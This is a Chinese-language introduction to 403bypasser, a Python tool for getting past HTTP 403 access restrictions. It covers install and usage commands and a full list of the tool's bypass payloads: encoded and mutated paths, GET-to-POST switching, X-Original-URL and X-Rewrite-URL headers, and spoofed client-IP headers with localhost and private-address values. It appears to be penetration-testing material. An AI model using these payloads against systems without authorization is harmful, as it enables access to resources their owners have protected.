如何使用403bypasser繞過目標頁面上的訪問控制限制

關于403bypasser

403bypasser是一款自動化工具，該工具能夠以自動化的形式實現針對目標頁面的訪問控制限制繞過技術。403bypasser項目目前仍處于積極開發階段，并且還會增加新的功能。

該工具基于Python語言開發，因此具備良好的跨平臺特性。

工具安裝

首先，我們需要使用下列命令將該項目源碼克隆至本地：

git clone https://github.com/yunemse48/403bypasser.git

接下來，運行下列命令安裝好該工具所需的依賴模塊：

pip install -r requirements.txt

此時，403bypasser已完成安裝。

工具參數

工具使用

使用樣例1

python3 403bypasser.py -u https://example.com -d /secret

使用樣例2

python3 403bypasser.py -u https://example.com -D dirlist.txt

使用樣例3

python3 403bypasser.py -U urllist.txt -d /secret

使用樣例4

python3 403bypasser.py -U urllist.txt -D dirlist.txt

注意事項：下面給出的例子中，不同斜杠使用的結果都是一樣的，你可以選擇自己喜歡的方式：

python3 403bypasser.py -u https://example.com -d secret

python3 403bypasser.py -u https://example.com -d /secret

python3 403bypasser.py -u https://example.com -d /secret/

python3 403bypasser.py -u https://example.com -d secret/

python3 403bypasser.py -u https://example.com/ -d secret

該工具支持的功能

請求方法篡改

將GET請求轉換為POST請求

路徑篡改

/%2e/secret

/secret/

/secret..;/

/secret/..;/

/secret%20

/secret%09

/secret%00

/secret.json

/secret.css

/secret.html

/secret?

/secret??

/secret???

/secret?testparam

/secret#

/secret#test

/secret/.

//secret//

/./secret/./

通過非標準Header重寫目標URL

X-Original-URL: /secret

X-Rewrite-URL: /secret

其他Header&值

Header：

X-Custom-IP-Authorization

X-Forwarded-For

X-Forward-For

X-Remote-IP

X-Originating-IP

X-Remote-Addr

X-Client-IP

X-Real-IP

值：

localhost

localhost:80

localhost:443

127.0.0.1

127.0.0.1:80

127.0.0.1:443

2130706433

0x7F000001

0177.0000.0000.0001

0

127.1

10.0.0.0

10.0.0.1

172.16.0.0

172.16.0.1

192.168.1.0

192.168.1.1

工具運行截圖

項目地址

403bypasser：https://github.com/yunemse48/403bypasser